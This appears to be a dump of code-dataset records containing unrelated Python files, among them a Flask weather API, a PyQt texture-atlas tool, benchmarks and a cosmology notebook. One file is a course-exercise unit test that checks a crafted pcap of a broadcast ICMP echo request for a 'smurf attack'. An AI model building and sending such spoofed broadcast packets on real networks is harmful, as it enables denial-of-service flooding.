nullable=True))\n","repo_name":"angry-tony/quay","sub_path":"data/migrations/versions/c91c564aad34_drop_checksum_on_imagestorage.py","file_name":"c91c564aad34_drop_checksum_on_imagestorage.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72777159146","text":"a = int(input('How many row to you want : '))\nb = int(input('Type 1 for ascending and 0 for descending prints : '))\nc = bool(b)\nif c == True:\n for i in range(1,a+1):\n for j in range(1,i+1):\n print('*',end=\" \")\n print()\nelif c == False:\n for i in range(a,0,-1):\n for j in range(1,i+1):\n print(\"*\",end=\" \")\n print()\n\n\n","repo_name":"KojoAning/PYHTON_PRACTICE","sub_path":"printing_pattern.py","file_name":"printing_pattern.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"353916117","text":"from 
dashmachine.dm.utils import resolve_onpress_option\n\n\nclass Title:\n def __init__(self, options):\n \"\"\"\n This section contains text that is below the icon (if present) on the card.\n\n :param options: (dict) the key/value pairs from this section of the\n card's config toml\n \"\"\"\n\n # parse string shorthand\n if isinstance(options.get(\"title\"), str):\n self.text = options[\"title\"]\n else:\n # apply user config dict\n for key, value in options.get(\"title\", {}).items():\n setattr(self, key, value)\n\n # set defaults\n if hasattr(self, \"onpress\"):\n self.onpress = resolve_onpress_option(self.onpress)\n","repo_name":"rmountjoy92/DashMachine-0.7","sub_path":"dashmachine/dm/dashboard_card/title.py","file_name":"title.py","file_ext":"py","file_size_in_byte":723,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"37"} +{"seq_id":"4421863234","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Nov 20 19:21:48 2019\r\nhttps://ktr89.hateblo.jp/entry/2019/03/21/220741\r\n@author: hfuji\r\n\"\"\"\r\n\r\nfrom benchmarker import Benchmarker\r\nimport numpy as np\r\n\r\nfrom modin import pandas as mpd\r\nimport pandas as ppd\r\nimport dask.dataframe as ddf\r\nimport dask.multiprocessing\r\n\r\ndef run(row, col, loop=3):\r\n\r\n df_random = ppd.DataFrame(np.random.randn(row, col))\r\n df_random.to_csv(\"random.csv\")\r\n\r\n with Benchmarker(loop) as bench:\r\n\r\n @bench(f'original pandas row:{row} col:{col}')\r\n def original_pandas_read(bm):\r\n ppd.read_csv('random.csv')\r\n\r\n\r\n @bench(f'modin pandas row:{row} col:{col}')\r\n def modin_read(bm):\r\n mpd.read_csv('random.csv')\r\n\r\n @bench(f'dask pandas row:{row} col:{col}')\r\n def dask_read(bm):\r\n df = ddf.read_csv('random.csv')\r\n df = df.compute()\r\n\r\nif __name__ == \"__main__\":\r\n\r\n for r in [1, 10, 100,\r\n 1_000, 10_000, 100_000,\r\n 1_000_000, 10_000_000, 100_000_000]:\r\n run(row=r, col=273)\r\n ","repo_name":"hfujikawa/DataSci","sub_path":"modin_bench.py","file_name":"modin_bench.py","file_ext":"py","file_size_in_byte":1075,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"24960031997","text":"#!/usr/bin/env python3\n\nimport unittest\nimport unittest.mock\nimport importlib\nimport sys\nimport pathlib\nimport random\nimport io\nimport socket\nimport os.path\n\nimport deliverable as student\n#import solution2 as student\n\nclass TestPart1(unittest.TestCase):\n def setUp(self):\n self.fname = 'packet.pcap'\n if os.path.isfile(self.fname):\n os.remove(self.fname)\n self.pcapfileheader = (0, 24, b'\\xa1\\xb2\\xc3\\xd4\\x00\\x02\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\xff\\xff\\x00\\x00\\x00\\x65')\n self.pcappackheader = (24, 16, b'\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x1c\\x00\\x00\\x00\\x1c')\n self.ipheader = (40, 20, b'\\x45\\x00\\x00\\x1c\\x3a\\xa1\\x00\\x00\\xff\\x01\\xfe\\xee\\xc0\\xa8\\x00\\x01\\xc0\\xa8\\x00\\xff')\n self.icmpheader = (60, 8, b'\\x08\\x00\\xf7\\xfd\\x00\\x01\\x00\\x01')\n self.ihlval = (0x28, 1, 0xF, 0, 5, 'IHL Version')\n self.ipversion = (0x28, 1, 0xF0, 4, 4, 'IP Version')\n self.ipproto = (0x31, 1, 0xFF, 0, 1, 'IP Protocol')\n self.icmptype = (0x3C, 1, 0xFF, 0, 8, 'ICMP Type')\n self.checks = (self.ihlval, self.ipversion, self.ipproto, self.icmptype)\n\n def getPcapBytes(self, filename):\n with open(filename, 'rb') as fp:\n return fp.read()\n\n def validateBytes(self, offset, blen, act, exp):\n for x in range(offset, offset + blen + 1):\n 
self.assertEqual(act[x], exp[x])\n\n def test_pcap(self):\n student.createSmurfAttack()\n self.assertTrue(os.path.isfile(self.fname), 'File {} does not exist'.format(self.fname))\n pcapbytes = self.getPcapBytes(self.fname)\n self.assertEqual(len(pcapbytes), 68, 'Length of {} is incorrect'.format(self.fname))\n for check in self.checks:\n self.assertEqual((pcapbytes[check[0]] & check[2]) >> check[3], check[4], 'Invalid: {}'.format(check[5]))\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Trist0ne/PRACTICE-PYTHON-CYB-","sub_path":"Triston Vaira/Python Gitlab/activities/pe3/part1/check.py","file_name":"check.py","file_ext":"py","file_size_in_byte":1899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"70288635946","text":"import numpy as np\n\nimport sqlalchemy\nfrom sqlalchemy.ext.automap import automap_base\nfrom sqlalchemy.orm import Session\nfrom sqlalchemy import create_engine, func\n\nfrom flask import Flask, jsonify\n\n#################################################\n# Database Setup\n#################################################\nengine = create_engine(\"sqlite:///Resources/hawaii.sqlite\")\n\n# reflect an existing database into a new model\nBase = automap_base()\n# reflect the tables\nBase.prepare(engine, reflect=True)\n\n# Save reference to the table\nmeasurement = Base.classes.measurement\nstation = Base.classes.station\n\n#################################################\n# Flask Setup\n#################################################\napp = Flask(__name__)\n\n#################################################\n# Flask Routes\n#################################################\n\n@app.route(\"/\")\ndef welcome():\n \"\"\"List all available api routes.\"\"\"\n return (\n f\"Available Routes:<br/>\"\n f\"1. Previous year's precipitation data: (/api/v1.0/precipitation)<br/>\"\n f\"2. List of all stations: (/api/v1.0/stations)<br/>\"\n f\"3. Previous year's temperature observations at the most active station: (/api/v1.0/tobs)<br/>\"\n f\"4. Min, Average & Max Temperatures for Date Range: (/api/v1.0/trip/[start date]/[end date])<br/><br/>\"\n f\"Dates provided must be in yyyy-mm-dd format, if no end-date is provided, the trip api calculates stats through 23/08/2017<br/>\" \n )\n\n@app.route(\"/api/v1.0/precipitation\")\ndef precipitation():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \"\"\"List all precipitation data for the previous year\"\"\"\n # Query precipitation data for previous year \n \n start = '2016-08-23'\n sel = [measurement.date, \n func.sum(measurement.prcp)]\n precipitation = session.query(*sel).\\\n filter(measurement.date >= start).\\\n group_by(measurement.date).\\\n order_by(measurement.date).all()\n \n session.close()\n\n # Output precipitation data for previous year\n dates = []\n totals = []\n\n for date, dailytotal in precipitation:\n dates.append(date)\n totals.append(dailytotal)\n \n precipitation_dict = dict(zip(dates, totals))\n\n return jsonify(precipitation_dict)\n\n@app.route(\"/api/v1.0/stations\")\ndef stations():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n\n \"\"\"Output list of all the active Weather stations in Hawaii\"\"\"\n # Output list of active weather stations in Hawaii\n sel = [measurement.station]\n active_stations = session.query(*sel).\\\n group_by(measurement.station).all()\n session.close()\n\n list_of_stations = list(np.ravel(active_stations)) \n return jsonify(list_of_stations)\n\n@app.route(\"/api/v1.0/tobs\")\ndef tobs():\n # Create our session (link) from Python to the DB\n session = Session(engine)\n # Query the last 12 months of temperature observation data for the most active station\n start_date = '2016-08-23'\n sel = [measurement.date, \n measurement.tobs]\n station_temps = session.query(*sel).\\\n filter(measurement.date >= start_date, measurement.station == 'USC00519281').\\\n group_by(measurement.date).\\\n order_by(measurement.date).all()\n\n session.close()\n\n # Return a dictionary with the date as key and the daily temperature observation as value\n dates = []\n temps = []\n\n for date, observation in station_temps:\n dates.append(date)\n temps.append(observation)\n \n most_active_tobs_dict = dict(zip(dates, temps))\n\n return jsonify(most_active_tobs_dict)\n\n@app.route(\"/api/v1.0/trip/<start_date>\")\ndef trip1(start_date, end_date='2017-08-23'):\n # Calculate minimum, average and maximum temperatures for the range of dates starting with start date.\n # If no end date is provided, the function defaults to 2017-08-23.\n\n session = Session(engine)\n query_result = session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)).\\\n filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n session.close()\n\n 
trip_stats = []\n for min, avg, max in query_result:\n trip_dict = {}\n trip_dict[\"Min\"] = min\n trip_dict[\"Average\"] = avg\n trip_dict[\"Max\"] = max\n trip_stats.append(trip_dict)\n\n # If the query returned non-null values return the results,\n # otherwise return an error message\n if trip_dict['Min']: \n return jsonify(trip_stats)\n else:\n return jsonify({\"error\": f\"Date {start_date} not found or not formatted as YYYY-MM-DD.\"}), 404\n \n@app.route(\"/api/v1.0/trip/<start_date>/<end_date>\")\ndef trip2(start_date, end_date='2017-08-23'):\n # Calculate minimum, average and maximum temperatures for the range of dates starting with start date.\n # If no valid end date is provided, the function defaults to 2017-08-23.\n\n session = Session(engine)\n query_result = session.query(func.min(measurement.tobs), func.avg(measurement.tobs), func.max(measurement.tobs)).\\\n filter(measurement.date >= start_date).filter(measurement.date <= end_date).all()\n session.close()\n\n trip_stats = []\n for min, avg, max in query_result:\n trip_dict = {}\n trip_dict[\"Min\"] = min\n trip_dict[\"Average\"] = avg\n trip_dict[\"Max\"] = max\n trip_stats.append(trip_dict)\n\n # If the query returned non-null values return the results,\n # otherwise return an error message\n if trip_dict['Min']: \n return jsonify(trip_stats)\n else:\n return jsonify({\"error\": f\"Date(s) not found, invalid date range or dates not formatted correctly.\"}), 404\n \n\nif __name__ == '__main__':\n app.run(debug=True)\n","repo_name":"j-fairgrieve-bootcamp/sqlalchemy-challenge","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5929,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"}
+{"seq_id":"42940839352","text":"from PyQt5 import QtWidgets, QtCore, QtGui\r\nimport os\r\nimport subprocess\r\nfrom managerPaths import Paths\r\nfrom staticMethods import StaticMethods\r\n\r\nclass Ui_SkinConverter(object):\r\n def __init__(self, win, app):\r\n self.app = app\r\n self.win = win\r\n self.setupUi(win)\r\n win.show()\r\n\r\n self.texturePackerSettings = 'TexturePacker --format phaser-json-hash --png-opt-level 1 --force-squared ' \\\r\n '--max-size 4096 --scale 1 --scale-mode Smooth --algorithm MaxRects ' \\\r\n '--maxrects-heuristics Best --pack-mode Best --trim-mode Trim --pack-normalmaps ' \\\r\n '--normalmap-filter \"/normalmaps/\" --normalmap-suffix \"_n\"'\r\n\r\n def setupUi(self, skinConverter):\r\n skinConverter.resize(350, 200)\r\n skinConverter.setObjectName('skinConverterWindow')\r\n skinConverter.setWindowTitle('skin_converter')\r\n\r\n self.centralwidget = QtWidgets.QWidget(skinConverter)\r\n self.centralwidget.setObjectName('centralwidget')\r\n\r\n self.centralLayout = QtWidgets.QVBoxLayout()\r\n self.centralLayout.setObjectName('centralLayout')\r\n self.centralLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n self.centralLayout.setContentsMargins(20, 20, 20, 20)\r\n\r\n self.selectionWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.selectionWidget.setObjectName('selectionWidget')\r\n\r\n self.selectionLayout = QtWidgets.QHBoxLayout()\r\n self.selectionLayout.setObjectName('selectionLayout')\r\n self.selectionLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.buttonWidget = QtWidgets.QWidget(self.selectionWidget)\r\n self.buttonWidget.setObjectName('buttonWidget')\r\n\r\n self.buttonsLayout = QtWidgets.QVBoxLayout()\r\n self.buttonsLayout.setObjectName('buttonsLayout')\r\n self.buttonsLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.folderLineEdit = QtWidgets.QLineEdit(self.selectionWidget)\r\n self.folderLineEdit.setObjectName('folderLineEdit')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.folderLineEdit.setFont(font)\r\n self.folderLineEdit.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n\r\n self.chooseFolderButton = QtWidgets.QPushButton(self.buttonWidget)\r\n self.chooseFolderButton.setObjectName('chooseFolderButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.chooseFolderButton.setFont(font)\r\n self.chooseFolderButton.setText('Choose\\nDefaultMC')\r\n self.chooseFolderButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n 
self.chooseFolderButton.setMinimumHeight(50)\r\n self.chooseFolderButton.clicked.connect(lambda: self.chooseFolder())\r\n\r\n self.clearFolderButton = QtWidgets.QPushButton(self.buttonWidget)\r\n self.clearFolderButton.setObjectName('clearFolderButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.clearFolderButton.setFont(font)\r\n self.clearFolderButton.setText('Clear')\r\n self.clearFolderButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.clearFolderButton.setMinimumHeight(35)\r\n self.clearFolderButton.clicked.connect(lambda: self.clearFolder())\r\n\r\n self.buttonsLayout.addWidget(self.chooseFolderButton, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n self.buttonsLayout.addWidget(self.clearFolderButton, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n\r\n self.buttonWidget.setLayout(self.buttonsLayout)\r\n\r\n self.selectionLayout.addWidget(self.folderLineEdit, 6, alignment=QtCore.Qt.AlignmentFlag.AlignVCenter)\r\n self.selectionLayout.addWidget(self.buttonWidget, 4)\r\n\r\n self.selectionWidget.setLayout(self.selectionLayout)\r\n\r\n self.mainButtonsWidget = QtWidgets.QWidget(self.centralwidget)\r\n self.mainButtonsWidget.setObjectName('mainButtonsWidget')\r\n\r\n self.mainButtonsLayout = QtWidgets.QHBoxLayout()\r\n self.mainButtonsLayout.setObjectName('mainButtonsLayout')\r\n self.mainButtonsLayout.setSizeConstraint(QtWidgets.QLayout.SetDefaultConstraint)\r\n\r\n self.updateAtlasButton = QtWidgets.QPushButton(self.mainButtonsWidget)\r\n self.updateAtlasButton.setObjectName('updateAtlasButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.updateAtlasButton.setFont(font)\r\n self.updateAtlasButton.setText('Update\\natlas')\r\n self.updateAtlasButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.updateAtlasButton.setMinimumSize(150, 50)\r\n self.updateAtlasButton.setEnabled(False)\r\n self.updateAtlasButton.clicked.connect(lambda: self.updateAtlas())\r\n\r\n self.addTexturesButton = QtWidgets.QPushButton(self.mainButtonsWidget)\r\n self.addTexturesButton.setObjectName('addTexturesButton')\r\n font = QtGui.QFont()\r\n font.setFamily(\"Oswald Light\")\r\n font.setPointSize(StaticMethods.setFontSizeCaption(self.app))\r\n self.addTexturesButton.setFont(font)\r\n self.addTexturesButton.setText('Add textures\\nfrom somewhere')\r\n self.addTexturesButton.setSizePolicy(QtWidgets.QSizePolicy.Policy.Expanding, QtWidgets.QSizePolicy.Policy.Expanding)\r\n self.addTexturesButton.setMinimumSize(150, 50)\r\n self.addTexturesButton.setEnabled(False)\r\n\r\n spacerH1 = QtWidgets.QSpacerItem(50, 40, QtWidgets.QSizePolicy.Policy.Fixed,\r\n QtWidgets.QSizePolicy.Policy.Fixed)\r\n\r\n self.mainButtonsLayout.addWidget(self.updateAtlasButton)\r\n self.mainButtonsLayout.addItem(spacerH1)\r\n self.mainButtonsLayout.addWidget(self.addTexturesButton)\r\n\r\n self.mainButtonsWidget.setLayout(self.mainButtonsLayout)\r\n\r\n self.centralLayout.addWidget(self.selectionWidget)\r\n self.centralLayout.addWidget(self.mainButtonsWidget)\r\n\r\n self.centralwidget.setLayout(self.centralLayout)\r\n\r\n skinConverter.setCentralWidget(self.centralwidget)\r\n\r\n def clearFolder(self):\r\n self.folderLineEdit.clear()\r\n self.currFolder = ''\r\n self.updateAtlasButton.setEnabled(False)\r\n 
self.folderLineEdit.setEnabled(True)\r\n        self.chooseFolderButton.setEnabled(True)\r\n\r\n    def chooseFolder(self):\r\n        fileDialog = QtWidgets.QFileDialog()\r\n        self.currFolder = fileDialog.getExistingDirectory()\r\n        self.folderLineEdit.setText(self.currFolder)\r\n        self.folderLineEdit.setEnabled(False)\r\n        self.updateAtlasButton.setEnabled(True)\r\n        self.chooseFolderButton.setEnabled(False)\r\n\r\n    def updateAtlas(self):\r\n        pathToConverter = os.path.join(Paths.tools, 'minecraft_skin_converter.exe')\r\n        pathToSkin = os.path.join(Paths.world, 'skin.dat')\r\n        pathToMCAssets = os.path.join(self.currFolder, 'assets')\r\n        pathToAtlasPng = os.path.join(Paths.world, 'world.png')\r\n        pathToWorldJson = os.path.join(self.currFolder, 'world.json')\r\n        pathToTextures = os.path.join(self.currFolder, 'assets', 'minecraft', 'textures', 'block')\r\n\r\n        try:\r\n            os.remove(pathToSkin)\r\n        except FileNotFoundError:\r\n            pass\r\n\r\n        try:\r\n            os.remove(pathToAtlasPng)\r\n        except FileNotFoundError:\r\n            pass\r\n\r\n        try:\r\n            os.remove(os.path.join(Paths.world, 'world_n.png'))\r\n        except FileNotFoundError:\r\n            pass\r\n\r\n\r\n        subprocess.call('start /wait ' + self.texturePackerSettings + ' --sheet \"' + pathToAtlasPng +\r\n                        '\" --data \"' + pathToWorldJson + '\" \"' + pathToTextures + '\"', shell=True, cwd=os.getcwd())\r\n        subprocess.call('start /wait ' + pathToConverter + ' ' + pathToSkin + ' ' + pathToMCAssets + ' ' + pathToWorldJson,\r\n                        shell=True)\r\n\r\n        messageBox = QtWidgets.QMessageBox()\r\n        messageBox.setIcon(QtWidgets.QMessageBox.Information)\r\n        messageBox.setText(\"Info\")\r\n        messageBox.setInformativeText('Files world.png, world_n.png and skin.dat have been successfully converted in the \"world\" directory.')\r\n        messageBox.setWindowTitle(\"Info\")\r\n        messageBox.exec_()\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    import sys\r\n    app = QtWidgets.QApplication(sys.argv)\r\n    mainWindow = QtWidgets.QMainWindow()\r\n    Paths.getDir('Release')\r\n    Ui_SkinConverter(mainWindow, app)\r\n    mainWindow.show()\r\n    sys.exit(app.exec_())","repo_name":"AntonElkin1996/assets_manager","sub_path":"skinConverter.py","file_name":"skinConverter.py","file_ext":"py","file_size_in_byte":9028,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21873534134","text":"from __future__ import print_function, unicode_literals\n\nimport students.utils.find_student\nfrom django.utils.timezone import now\nfrom gradebook.models import Response, Role, Score\nfrom people.models import Person\n\n###############################################################\n\nDJANGO_COMMAND = \"main\"\nUSE_ARGPARSE = True\nOPTION_LIST = (\n    ([\"--task-pk\"], {\"help\": \"Restrict to a particular task by primary key\"}),\n    ([\"--viewport\"], {\"help\": \"Restrict to a particular viewport by slug\"}),\n    (\n        [\"--alive\"],\n        {\n            \"help\": \"Restrict to sections that have at least one active role\",\n            \"action\": \"store_true\",\n        },\n    ),\n    ([\"iclicker_id\"], {\"nargs\": \"*\", \"help\": \"i>clicker IDs to rescore\"}),\n)\nHELP_TEXT = \"Rescore i>clicker responses\"\n\n###############################################################\n\n# enable iclicker.com websync:\nstudents.utils.find_student.by_iclicker.use_websync = True\n\n###############################################################\n\n\ndef alive_ledgers(dt=None):\n    if dt is None:\n        dt = now()\n    role_qs = Role.objects.active().filter(\n        person__active=True,\n        viewport__active=True,\n        viewport__ledger__active=True,\n        dtstart__lte=dt,\n        dtend__gt=dt,\n    )\n    
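# return just the distinct set of ledger ids these active roles point to\n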
    return set(role_qs.values_list(\"viewport__ledger_id\", flat=True))\n\n\n###############################################################\n\n\ndef print_tabs(*args):\n    print(\"\t\".join([\"{}\".format(a) for a in args]))\n\n\n###############################################################\n\n\ndef main(options, args):\n    args = options[\"iclicker_id\"]\n    verbosity = int(options[\"verbosity\"])\n    task = options[\"task_pk\"]\n    # section = options['section']\n    viewport = options[\"viewport\"]\n    alive = options[\"alive\"]\n\n    dtnow = now()\n\n    qs = Response.objects.active().filter(\n        scored=False, description__startswith=\"i>clicker session \"\n    )\n    if alive:\n        qs = qs.filter(task__ledger_id__in=alive_ledgers(dtnow))\n    # if section:\n    #     qs = qs.filter(task__section__slug=section)\n    if viewport:\n        qs = qs.filter(task__ledgerviewport__slug=viewport)\n    if task:\n        qs = qs.filter(task__pk=task)\n    if args:\n        qs = qs.filter(student_id__in=args)\n    iclicker_list = set(qs.values_list(\"student_id\", flat=True))\n    for iclicker in iclicker_list:\n        # force a websync for registrations that do not exist...\n        try:\n            students.utils.find_student.by_iclicker(iclicker)\n        except Exception:\n            pass\n    task_list = qs.values_list(\"task_id\", flat=True)\n    person_list = Person.objects.filter(\n        student__iclicker__iclicker_id__in=iclicker_list\n    )\n    score_list = Score.objects.filter(task__in=task_list, person_id__in=person_list)\n\n    # TODO: consider a --force-all-no-really flag which sets\n    # ``exclude_iclickers=False``:\n    score_list.update_for_recalc()\n    if verbosity > 0:\n        print(score_list.count(), \"scores set for recalculation\")\n\n\n###############################################################\n","repo_name":"dgabrielson/django-dept-gradebook","sub_path":"gradebook/cli/gb2/iclicker/rescore.py","file_name":"rescore.py","file_ext":"py","file_size_in_byte":3072,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70110830187","text":"import requests\nimport os\nfrom data.compute.compute_data import openstack_compute_data\nfrom data.network.network_data import openstack_network_data\nfrom data.terraform_openstack.openstack_terraform import Terraform\n\ndef create_credentials_token(key):\n    print(\"Create Credentials Token\")\n\n    data = '{\"auth\": {\"identity\": {\"methods\": [\"password\"],\"password\": {\"user\": {\"id\":\"' + key['OS_ADMIN_ID'] + '\",\"password\":\"' + key['OS_PASSWORD'] + '\"}}},\"scope\": {\"project\": {\"domain\": {\"id\":\"' + key['OS_PROJECT_DOMAIN_ID'] + '\"},\"name\":\"' + key['OS_USERNAME'] + '\"}}}}'\n    try:\n        res = requests.post(key['OS_AUTH_URL']+':5000/v3/auth/tokens', data=data)\n        token = res.headers['X-Subject-token']\n\n    except Exception as ex:\n        print(ex)\n        raise  # without a token the callers below cannot continue\n    print(\"Complete Credentials Token\")\n    return token\n\n\n\ndef openstack_data_all(key):\n    path = os.path.dirname(os.path.abspath('.')) + \"/data/terraform_openstack/\" \n    print(\"GET Openstack All data\")\n    OS_TOKEN = create_credentials_token(key)\n    print(\"Create terraform openstack provider\")\n    Terraform.make_terraform_provider(path + \"compute/\", key, OS_TOKEN)\n    Terraform.make_terraform_provider(path + \"network/\", key, OS_TOKEN)\n    Terraform.make_terraform_provider(path + \"database/\", key, OS_TOKEN)\n    Terraform.make_terraform_provider(path + \"storage/\", key, OS_TOKEN)\n\n    print(\"Complete terraform openstack provider\")\n    print(\"Get Compute Data\")\n    compute = openstack_compute_data(path + \"compute/\", key, OS_TOKEN)\n    print(\"Complete Compute Data\")\n
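    # gather network data next; its resources are merged into the compute payload below\n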
print(\"Get Network Data\")\n network = openstack_network_data(path + \"network/\", key, OS_TOKEN)\n print(\"Complete Network Data\")\n \n compute['resources'] += network['resources']\n\n return compute\n\n","repo_name":"ddorahee/openstack_agent","sub_path":"data/openstack_data_manage.py","file_name":"openstack_data_manage.py","file_ext":"py","file_size_in_byte":1743,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"5040234985","text":"from django.urls import path\nfrom . import views\n\n\nurlpatterns = [\n path('', views.index, name='index'),\n path('login', views.signin, name='login'),\n path('books', views.showbooks, name='books'),\n path('signup', views.signup, name='signup'),\n path('signout', views.signout, name='signout'),\n path('book/', views.book, name='book')\n\n]","repo_name":"ghinayazahra/bookreview","sub_path":"bukuku/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":364,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8026124294","text":"from pandas import Series\n\n\ndef value_counts(values: Series):\n \"\"\"Value_counts with predictable sort of values that have equal count.\n\n Useful at reducing diffs between consecutive runs of notebooks where value_counts is used.\n \"\"\"\n name = values.name or 0\n\n return (\n values.value_counts()\n .reset_index()\n .sort_values([name, 'index'], ascending=[False, True])\n .set_index('index')\n [name]\n )\n","repo_name":"krassowski/multi-omics-state-of-the-field","sub_path":"helpers/frames.py","file_name":"frames.py","file_ext":"py","file_size_in_byte":448,"program_lang":"python","lang":"en","doc_type":"code","stars":21,"dataset":"github-code","pt":"37"} +{"seq_id":"8114404810","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[3]:\n\n\nfrom scipy.integrate import odeint\nimport numpy as np\nfrom matplotlib import pyplot as plt\n\n\n# In[4]:\n\n\n#Constantes fisicas. Modelo de Scherer F(X)=F0+F2(X-X0)**2. 
F has a minimum at X0\nomega_DE=0.7\nomega_m=1-omega_DE\n\nMpc=1\nh=.7\nm=Mpc/(3.086e22)\neV=1/(0.197e-6*m)\nM_p=2.4e27*eV\nH_0=(100/3e5)*h/Mpc\nrho_c0=3*H_0**2*M_p**2\nG=1/(8*np.pi*M_p**2) #M_p**2=1/(8*pi*G)\nX_0=1\na_ini=1/3e3 #a_eq, matter-radiation equality\ne1_a1=0.0001\ny_ini=np.sqrt(2*(1+ e1_a1/a_ini**3 )*X_0) #y_ini=np.sqrt(2*X_ini)\nX_ini=y_ini**2/2\n#print(e1_a1/a_ini**3)\nF_0=-omega_DE*rho_c0 #\nF_2=omega_m*rho_c0/(4*X_0**2*e1_a1)\nyr=9.467e15*m\nt_uni=13.7e9*yr\nt_eq=10e11*3e8*m\nprint(\"t_uni = \", t_uni)\nprint(\"F_0 = \", F_0)\nprint(\"F_2 = \", F_2)\n\n\n# In[5]:\n\n\nyr\n\n\n# In[6]:\n\n\n# Analytic solution for X=X(a)\ndef X_analit(a):\n    X = X_0*(1+e1_a1/a**3)\n    return X\n\n\n# In[7]:\n\n\n# Scale-factor array from matter-radiation equality until today.\na_arreglo=np.linspace(a_ini,1,1000) #a_ini=a_eq\n\n\n# In[8]:\n\n\n# Plot of the analytic X=X(a) from the equality epoch until today.\nplt.plot(a_arreglo,X_analit(a_arreglo))\nplt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.xlabel(\"a\")\nplt.ylabel(\"X(a)\")\nplt.title(\"Analytic solution for X=X(a) from the equality epoch until today\")\n\n\n# In[9]:\n\n\n# Analytic solution for t=t(a)\n#A\ndef ta(a):\n    a_eq=a_ini\n    A=-8*np.pi*G*F_0/3\n    B=32*np.pi*G*F_2*(X_0**2)*e1_a1/3\n    \n    l1=2*np.log( np.sqrt(A)*a**(3/2) + np.sqrt(A*a**3+B))\n    l2=3*np.sqrt(A)\n    c=-2*np.log(B)/(3*np.sqrt(A))\n    #print(A*a**3,B)\n    return l1/l2 + c \n\n\n# In[10]:\n\n\n#ta(1)\n\n\n# In[11]:\n\n\n# Interestingly, ta(a_arreglo) gives negative values\nplt.plot(ta(a_arreglo) ,a_arreglo,'.', label='Analytic solution for a=a(t) including DM & DE') \n\n#plt.xscale(\"log\")\nplt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\nplt.title(\"Analytic solution for a=a(t) including DM & DE\")\nplt.legend()\nplt.show()\n\n\n# In[40]:\n\n\nt_analitica=ta(a_arreglo)\nplt.plot(t_analitica[:-1] ,(a_arreglo[1:]-a_arreglo[:-1])/(t_analitica[1:]-t_analitica[:-1]), label='Delta(a)/Delta(t) including DM & DE') \n\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\nplt.title(\"Analytic solution for a=a(t) including DM & DE\")\nplt.legend()\nplt.show()\n\n\n# In[13]:\n\n\n# Here ta(a_arreglo) also gives negative values\nB=np.sqrt(4*F_2*X_0**2*e1_a1/(3*M_p**2))\nplt.plot(2*a_arreglo**(3/2)/(3*B), a_arreglo, \".\", label=\"analytic a=a(t) for the DM part\")\n\nplt.plot(np.log(a_arreglo)/(np.sqrt(-F_0/(3*M_p**2))), a_arreglo, \".\", label=\"analytic a=a(t) for the DE part\")\n\n#plt.xscale(\"log\")\n#plt.yscale(\"log\")\nplt.ylabel(\"a(t)\")\nplt.xlabel(\"t\")\n#plt.xlim(-10,10000)\nplt.title(\"Analytic solution for a=a(t)\")\nplt.legend()\nplt.show()\n\n\n# In[14]:\n\n\nplt.plot(np.log(a_arreglo)/(np.sqrt(-F_0/(3*M_p**2))), a_arreglo, \".\", label=\"a=a(t) for the DE part\")\nplt.plot(t_analitica 